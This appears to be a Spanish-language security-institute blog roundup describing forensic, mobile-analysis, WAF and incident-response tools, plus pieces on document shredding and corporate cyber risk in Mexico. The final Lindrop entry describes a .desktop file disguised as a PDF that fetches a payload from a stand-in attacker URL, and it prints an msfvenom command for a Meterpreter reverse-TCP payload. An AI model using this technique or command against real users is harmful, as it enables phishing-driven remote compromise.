RECUPERABIT – HERRAMIENTA FORENSE PARA LA RECONSTRUCCIÓN DEL SISTEMA DE ARCHIVOS

RecuperaBit es un software de seguridad informática que intenta reconstruir las estructuras del sistema de archivos y recuperar archivos. Actualmente sólo soporta NTFS.

RecuperaBit intenta reconstruir la estructura de directorios independientemente de:

§  Tabla de particiones ausente

§  Límites de particiones desconocidos

§  Metadatos parcialmente sobrescritos

§  Formato rápido

El argumento principal es el path para una imagen bitstream de un disco o partición. RecuperaBit determina automáticamente los sectores desde los que se inician las particiones explica Salvador Ruiz, experto de seguridad informática de iicybersecurity IICS.

§  RecuperaBit no modifica la imagen del disco, sin embargo, lee algunas partes de ella varias veces a través de la ejecución. También debería funcionar en dispositivos reales, como / dev / sda, pero esto no es recomendable por los expertos de seguridad informática.

§  Opcionalmente, se puede especificar un archivo guardado con -s. La primera vez, después del proceso de escaneado, los resultados se guardan en el archivo. Después de la primera ejecución, el archivo se lee para analizar únicamente sectores interesantes y acelerar la fase de carga.

§  La sobrescritura del archivo guardado se puede forzar con -w.

§  RecuperaBit incluye una pequeña línea de comandos que permite los consultores de seguridad informática recuperar archivos y exportar el contenido de una partición en formato CSV. Éstos se exportan en el directorio especificado por -o (o recuperabit_output).

PYPY

RecuperaBit se puede ejecutar con la implementación estándar de cPython, sin embargo la velocidad puede incrementarse al usarla con el intérprete Pypy y el compilador JIT según expertos de seguridad informática:

pypy main.py /path/to/disk.img

RECUPERACIÓN DEL CONTENIDO DEL ARCHIVO

Los archivos se pueden restaurar uno a la vez o recursivamente, comenzando desde un directorio. Una vez finalizado el proceso de análisis, puedes comprobar la lista de particiones que se pueden recuperarse mediante el siguiente comando en el indicador:

Recoverable

Si desea recuperar archivos a partir de un directorio específico, puedes imprimir el tree en pantalla con el comando tree o puede exportar una lista de archivos CSV.

Acuerdo a expertos de seguridad informática, si prefieres extraer todos los archivos de los nodos Root y Lost Files, debes conocer el identificador del directorio raíz, dependiendo del tipo de sistema de archivos.

Read More

MARA: UNA HERRAMIENTA DE INGENIERÍA INVERSA Y ANÁLISIS DE APLICACIONES MÓVILES

MARA es una Mobile Application Reverse engineering and Analysis Framework. Es una herramienta que reúne herramientas de ingeniería inversa y análisis de aplicaciones móviles comúnmente utilizadas, para ayudar a probar aplicaciones móviles contra las amenazas de ciberseguridad móvil de OWASP. Su objetivo es hacer esta tarea más fácil y más amigable para los desarrolladores de aplicaciones móviles y profesionales de ciberseguridad.

Funciones de MARA

§  APK Ingeniería inversa

§  Desmontaje del bytecode Dalvik a smali bytecode vía baksmali y apktool

§  Desensamblaje del bytecode Dalvik a bytecode java mediante enjarify

§  Descomponer APK al código fuente de Java vía jadx

§  Decodificar archivo de manifiesto y recursos a través de apktool

Análisis Preliminar

§  Análisis de ciberseguridad de archivos smali para análisis a través de smalisca

§  Borrar activos, bibliotecas y recursos de apk

§  Extracción de datos de certificado a través de openssl

§  Extraer cadenas y permisos de aplicación a través de aapt

§  Identificar métodos y clases a través de ClassyShark

§  Analizar las vulnerabilidades de apk a través de androbugs

§  Analizar apk para posibles comportamientos maliciosos vía androwarn

§  Identificar compiladores, empaquetadores y obfuscadores vía APKiD

§  Generar gráficos de flujo de control desde código smali a través de smali-CFGs

§  Extraer rutas de ejecución, direcciones IP, URL, URI, correos electrónicos a través de regex

§  Escaneo SSL de dominio y ciberseguridad a través de pyssltest y testssl

Análisis del Manifiesto APK

§  Extraer Intents

§  Extraer las actividades exportadas

§  Extraer receptores

§  Extraer receptores exportados

§  Servicios de extracción

§  Extraer servicios exportados

§  Comprobar si apk permite copias de seguridad

§  Comprobar si apk permite el envío de códigos secretos

§  Comprobar si apk puede recibir SMS binarios

MARA es comúnmente utilizado por los expertos de ciberseguridad y nuevos investigadores de ciberseguridad deben aprender herramientas como MARA para ampliar sus conocimientos y resolver caso de ciberseguridad.

 

https://github.com/xtiankisutsa/MARA_Framework

Read More

VOLATILITY BOT – UN ANALIZADOR DE MEMORIA AUTOMATIZADO PARA ANÁLISIS DE MALWARE Y MEMORIA

Parte del trabajo de los investigadores de seguridad informática que tienen que pasar dificultades cuando estudian nuevos programas maliciosos o desean analizar ejecutables sospechosos lo cual consiste en extraer el archivo binario y todas las diferentes inyecciones y cadenas descifradas durante la ejecución del malware. Volatility Bot fue creado por expertos de seguridad web para resolver estos tipos de problemas.

Según investigadores de seguridad informática, Volatility Bot es una herramienta de automatización para investigadores de seguridad web que corta todas las tareas de conjeturas y manuales de la fase de extracción binaria, también sirve para ayudar al investigador de seguridad web en los primeros pasos de realizar una investigación de análisis de memoria. No sólo extrae automáticamente el ejecutable (exe), sino que también busca todos los nuevos procesos creados en la memoria, inyecciones de código, cadenas, direcciones IP, etc.

En la nueva versión de Volatility Bot, una nueva característica es el análisis automatizado de vaciados de memoria, utilizando heurística y YARA / Clam AV Scanners. Según expertos de seguridad web, de de International Institute of Cyber Security IICS esta función es útil para el análisis de la memoria a escala. Por lo general, este proceso inicial se realiza manualmente, ya sea a través de una muestra de malware o un vaciado de memoria y puede ser largo y tedioso.

CARACTERÍSTICAS ACTUALES

§  Análisis automatizado de muestras de malware (Basado en diferencias entre la imagen de memoria limpia y la infectada)

§  Extracción del código inyectado

§  Descarga de nuevos procesos

§  Escaneo Yara, análisis estático, extracción de cadenas, etc. en todos los trabajaos.

§  Análisis heuristic automatizado de los vaciados de memoria que ayuda muchos los investigadores de seguridad informática.

§  Detectar anomalías usando heuristic y arrojar el código relevante

§  Análisis Yara, análisis estático, extracción de cadenas, etc. en todos los trabajos.

INSTALACIÓN

1.    Crear una nueva máquina virtual, con Windows XP hasta Windows 10 x64.

2.    Asegúrese de que la máquina tiene windows defender, programas de seguridad informática, seguridad web y FW deshabilitados, y tiene un IP estático

3.    Instalar python 3.5

4.    Crear c: \ temp carpeta, o cambie la carpeta de destino en config

5.    Copie el agente.py de Utils e inícielo

6.    Tome una instantánea de la VM

7.    Repita los pasos 1-6 para tantas máquinas virtuales como desee

 

Read More

¿CUÁL SON LOS REQUISITOS Y TÉCNICAS DE DESTRUCCIÓN DE DOCUMENTOS Y PAPEL?

Además de los impuestos, lo que une a cada negocio es que poseen información altamente sensible que no debe ser vista por personas no autorizadas. Mientras que algunos documentos pueden ser destruidos minutos después de la impresión, las regulaciones pueden requerir que otros sean archivados de algunos años a permanentemente. Pero entre estos dos extremos de la escala, su organización puede potencialmente tener un gran volumen de datos impresos ocupando el espacio como un pasivo, tanto desde una perspectiva legal como de seguridad de la información y destrucción de documentos.

Según expertos de destrucción de documentos de Dim Destrucción, dependiendo de cuánto tiempo ha estado en el negocio, el número de sitios físicos y el número de personas que emplea, es posible tener cientos de miles, sino millones, de páginas de copias impresas almacenadas en toda su empresa – gran parte de los cuales son datos confidenciales que pueden ser destruidos con ayuda de una empresa de destrucción de papel.

Las empresas deben tener la política de retención de registros y destrucción de documentos. Desde registros de marcas, registros de seguridad, hasta registros de jubilación, pensión y mucho más, hay mucho que necesita ser retenido. Pero una vez que el período de retención ha terminado, gran parte de esos documentos pueden ser destruidos mencionan expertos de destrucción de papel. A continuación se muestra una lista parcial de los tipos de información que absolutamente debe ser triturado cuando ya no se necesita.

También hay que tener en cuenta varios reglamentos. Por ejemplo, Sarbanes-Oxley se ocupa de la destrucción de documentos empresariales, registros y convierte la destrucción de papel en un proceso que debe ser cuidadosamente monitoreado. Si el proceso no se sigue, los ejecutivos pueden encontrarse bajo acusación. Haber documentado formalmente políticas de retención de datos es un requisito.

Además de las cuestiones reglamentarias y éticas en torno a mantener esas copias impresas seguras, la realidad es que muchos de sus competidores adorarían poner sus manos sobre los documentos que estás tirando mención expertos de destrucción de documentos de Dim Destrucción. E incluso si sus competidores no están indagando en tus contenedores, otros pueden hacerlo e intentar vender sus secretos a sus competidores.

Además, la recesión actual significa que las organizaciones pueden tener que lidiar con empleados descontentos y enojados, así como aquellos que piensan que su trabajo o empresa pronto será eliminado. Con eso, el riesgo de un mal uso de información sensible es aún mayor.

En pocas palabras, las prácticas eficaces de destrucción de documentos impiden que la información caiga en manos equivocadas. Quizás el ejemplo más omnipresente de esto son los recibos de la carga de la tarjeta de crédito, que se recuperan de los compartimientos de basura por los buceadores de contenedores, que con frecuencia lo hacen con la intención de utilizar la información para las órdenes en línea o por teléfono. Muchas empresas descartan tal información de pago sin controles efectivos de destrucción de papel. Si no se utilizan tales controles, la información desenterrada de la investigación posterior al fraude podría ser muy embarazosa para explicar a los clientes, y también podría convertirse en una pesadilla de relaciones públicas o un costoso problema legal.

Read More

NAXSI – FIREWALL DE SOFTWARE ABIERTO PARA NGINX

Un WAF protege una aplicación Web controlando su entrada y salida y el acceso desde la aplicación. Se ejecuta como un dispositivo, un plug-in de servidor o un servicio basado en la nube, el WAF inspecciona todos los paquetes de datos HTML, HTTPS, SOAP y XML-RPC. A través de una inspección personalizable, es capaz de prevenir ataques contra seguridad web como XSS, inyección de SQL,sessionhijacking y buffer overflows, que los firewalls de red y los sistemas de detección de intrusos a menudo no son capaces de realizar.

NAXSI es un WAF de código abierto para Nginx (Web Application Firewall), que por defecto puede bloquear el 99% de los patrones conocidos involucrados en las vulnerabilidades del sitio web. NAXSI significa Nginx Anti XSS & SQL Injection y es creado por expertos de seguridad web.

Por defecto, lee un pequeño subconjunto de reglas simples de seguridad web que contienen el 99% de los patrones conocidos involucrados en vulnerabilidades de sitios web.

Siendo muy simple, esos patrones pueden coincidir con las consultas legítimas. El administrador de seguridad web puede agregar listas blancas manualmente analizando el registro de errores de Nginx o (recomendado) iniciar el proyecto mediante una fase de auto aprendizaje intensivo que generará automáticamente las reglas de lista blanca con respecto al comportamiento del sitio web.

Por el contrario de la mayoría de los firewall de aplicación web, Naxsi no se basa en una base de firmas, como un antivirus, y por lo tanto no puede ser eludido por un patrón de ataque “desconocido”. Acuerda a experiencia de expertos de seguridad web, otra diferencia principal entre NAXSI y otros WAF, NAXSI filtra sólo las solicitudes GET y POST, es un software libre y libre de usar.

Según los expertos de seguridad web de iicybersecurity, WAF como Naxsi puede ser utilizado por PYMES para implementar seguridad web Requiere un poco más de esfuerzo ya que usted tiene a la lista blanca para conseguir que las cosas funcionen, pero bloqueará ataques más ofuscados y poco comunes sin actualizaciones ni modificaciones.

 

Read More

RAPTOR WAF – UN FIREWALL GRATIS DE APLICACIONES WEB

Un firewall de aplicaciones web (WAF) es un firewall que supervisa seguridad web, filtra o bloquea el tráfico HTTP hacia y desde una aplicación Web.Un WAF también es capaz de detectar y prevenir nuevos ataques desconocidos al observar patrones desconocidos en los datos de tráfico. Raptor WAF es un firewall de aplicaciones web hecho en C, que usa DFA para ayudar en seguridad web y bloquear SQL Inyección, Cross Site Scripting (XSS) y PathTraversal.

Es esencialmente un firewall de aplicación web simple hecho en C, usando el principio KISS, haciendo poll utilizando la función select (), no es mejor que epoll () o kqueue () de BSD, pero es portátil.

Caracteristicas

Según los expertos de seguridad web de iicybersecurity, WAF como Raptor puede ser utilizado por PYMES para implementar seguridad web. Es ampliamente utilizado hoy en día para detectar y defenderse contra la mayoría de las inyecciones de SQL, ataques contra seguridad web y ataques XSS.

§  Bloquear ataques contra seguridad web como de XSS, Inyección de SQL y path traversal

§  Lista negra IPs para bloquear usuarios usando config / blacklist ip.txt

§  Soporta IPv6 e IPv4 para la comunicación

 

Read More

En la BMV, desprotegidas las firmas ante ciberataques

los hackers consiguen hasta US600,000 millones al año por invasiones, según especialistas en el tema de ciberseguridad.

Desprotegidas y sensibles ante un ataque cibernético. Así se encuentran las emisoras de la Bolsa Mexicana de Valores (BMV).

Especialistas coincidieron en que un ataque a sus computadoras, redes e información podría mermar notablemente sus operaciones y afectar sus finanzas. Sin embargo, no se protegen adecuadamente.

Expertos en ataques cibernéticos coincidieron en que las empresas en general y en específico las que cotizan en Bolsa destinan bajo presupuesto a su protección cibernética.

Los sectores que más ataques cibernéticos reciben son el financiero y de comercio electrónico.

Datos del International Institute of Cyber Security indican que en el 2016 cerca de 78% de las empresas en México han sido blanco de un ataque por medio de Internet.

A pesar de que ha ido en incremento el presupuesto para dicha área, firmas que cotizan en la BMV destinan solamente entre 5 y 8% de su presupuesto a ciberseguridad, porcentaje menor al de las empresas que cotizan en Nasdaq, que destinan entre 7 y 11% de su presupuesto para protegerse de ciberataques.

Dicha institución recomienda a una empresa en Bolsa una inversión anual contra ataques cibernéticos de entre 700,000 a 30 millones de dólares.

Compromiso bajo

“El nivel de compromiso para implementar ciberseguridad es bajo ya que sólo 45% de las empresas tiene una estrategia robusta de ciberseguridad y sólo 40% realiza evaluaciones regulares de ciberseguridad”, aseguró German Ruiz, consultor de Seguridad Cibernética-Ethical Hacking en International Institute of Cyber Security.

Marco DeMello, CEO de PSafe, aplicación de defensa contra ataques cibernéticos para teléfonos celulares, dijo que “todavía no están protegidas suficientemente las empresas contra un ciberataque. Son muy vulnerables. Y es que muy pocas empresas que son invadidas lo reportan, entonces no hay una legislación en América Latina para que las empresas que son comprometidas lo reporten al gobierno, no hay obligación legal, más que en Estados Unidos”.

Ruiz agregó que una empresa del tamaño de las que cotizan en Bolsa o internacionales recibe anualmente entre 2 a 10 millones de ataques cibernéticos, de los cuales, entre 2 y 5% son consumados.

Pérdidas millonarias

Sin embargo, a pesar de que el porcentaje es bajo, las pérdidas son cuantiosas a nivel mundial.

“El mercado de ataques cibernéticos en el mundo asciende a 600,000 millones de dólares, aunque dependen del tamaño de la empresa y tipo de negocio.

El costo por la reparación de daños es de entre 10,000 a 50,000 dólares para las pequeñas empresas y entre 50,000 a 150 millones de dólares, para las grandes”, consideró el consultor de Seguridad Cibernética.

Read More

IR-RESCUE: UNA HERRAMIENTA DE CÓDIGO ABIERTO PARA FORENSE Y RESPUESTA DE INCIDENTES

-rescue es un script ligero de Windows Batch que recopila unos numerosos de datos forenses de sistemas Windows de 32 bits y 64 bits respetando el orden de volatilidad y artefactos que se cambian con la ejecución del script. Se destina a la respuesta a incidentes utilizándose en diferentes etapas del proceso de digital forensic e investigación. Puede ser configurado para realizar colecciones completas de datos para fines de digital forensic e investigación, así como personalizar adquisiciones de tipos específicos de datos. La herramienta representa un esfuerzo para agilizar la recolección de datos de máquina, independientemente de las necesidades de la digital forensic y confiar menos en el soporte in sitio cuando el acceso remoto o el análisis en vivo no están disponibles.

Ir-rescue hace uso de comandos integrados de Windows y utilidades de terceros bien conocidas de Sysinternals y NirSoft, por ejemplo, algunas de código abierto. Está diseñada para agrupar las colecciones de datos según el tipo de datos. Por ejemplo, se agrupan todos los datos relacionados con la conexión en red, como los recursos compartidos de archivos abiertos y las conexiones TCP (Protocolo de control de la transmisión), mientras que los procesos, los servicios y las tareas se agrupan bajo malware. La herramienta de digital forensic también está diseñada con el propósito de no hacer uso de PowerShell y WMI (Windows Management Instrumentation) para que sea compatible transversalmente. La adquisición de tipos de datos y otras opciones generales se especifican en un archivo de configuración simple. Cabe señalar que el script lanza un gran número de comandos y herramientas, dejando una huella considerable en el sistema. El tiempo de ejecución varía dependiendo de la potencia de cálculo y de las configuraciones establecidas, aunque suele terminar dentro de un máximo de una hora si está configurado para ejecutarse completamente. Ir-rescue es una de las herramientas usada por los expertos de digital forensic de international institute of cyber security.

Ir-rescue ha sido escrito para la respuesta a incidentes y digital forensic, así como para los profesionales de la seguridad por igual. Por lo tanto, puede utilizarse para aprovechar las herramientas y comandos ya agrupados durante las actividades de digital forensic.

Ir-rescue se basa en una serie de utilidades de terceros para recopilar datos específicos de las maquinas. Las versiones de las herramientas se enumeran en la siguiente sección y se proporcionan con el paquete tal cual y, por lo tanto, sus licencias y acuerdos de usuario deben aceptarse antes de ejecutar ir-rescue.

Ir-rescue debe ejecutarse bajo una consola de línea de comandos con derechos de administrador y no requiere argumentos.

 

Read More

LINDROP – UN VECTOR DE INGENIERÍA SOCIAL PARA LOS OBJETIVOS LINUX

Según expertos de seguridad perimetral y seguridad lógica, la ingeniería social es el arte de manipular a las personas para que entreguen información confidencial. Los tipos de información que estos criminales están buscando puede variar, pero cuando los individuos son atacados, los criminales suelen tratar de engañarlos para que les den sus contraseñas o información bancaria, o acceder a su computadora para instalar en secreto software malintencionado que les dará acceso a sus contraseñas e información bancaria, así como el control de su computadora.

Los expertos de seguridad perimetral y seguridad lógica han creado un vector de ingeniería social para los objetivos Linux. Lindrop – es un vector de ingeniería social para los objetivos linux. Una utilidad python que genera un zip que contiene un archivo .desktop (shortcut) “malicioso” que se disfraza como un archivo PDF (no realmente, una especie de).Probablemente esto no es nada nuevo, pero los hackers y necesitaban una forma de dirigirse específicamente a los usuarios de Linux para ciertos compromisos de ingeniería social, seguridad perimetral y seguridad lógica donde podían enviar un archivo zip y / o tar.gz por correo electrónico y generar algo sobre la marcha.

Los cursos de seguridad perimetral como de iicybersecurity IICS deben enseñar las herramientas como Lindrop para los participantes entienden como implementar seguridad lógica y seguridad perimetral en su red.

Básicamente explota la sección “Exec” de un archivo .desktop para:

1.    Descargue un PDF y muéstrelo al usuario.

2.    Descargue y ejecute una linux/x86/meterpreter/reverse_tcppayload

Según expertos de seguridad perimetral y seguridad lógica, Lindrop toma 4 entradas:

Un nombre de salida para el archivo “PDF” (.desktop) que estará en el archivo zip.

Un nombre de salida para el archivo almacenado. 

Una URL de carga útil remota. (Http://www.attacker.com/payload) esto se descargará en el directorio / tmp en el equipo de destino. Para este ejemplo, simplemente estamos creando una carga útil con msfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload

Un PDF remoto para descargarse y mostrarse al usuario. En el caso de este ejemplo, estamos cargando de forma remota  Blackhat 2016’s Attende survey. Detrás de las escenas, Xpdf se utiliza para abrir el archivo PDF.

 

En el lado del atacante, tenemos un listener usando el siguiente archivo de recursos en metasploit, esperando una conexión desde la carga que el archivo .desktop ha descargado, y que hemos generado anteriormente con msfvenom.

Según los expertos de seguridad lógica, las soluciones de seguridad tradicional no detectaran un ataque de este tipo.

Read More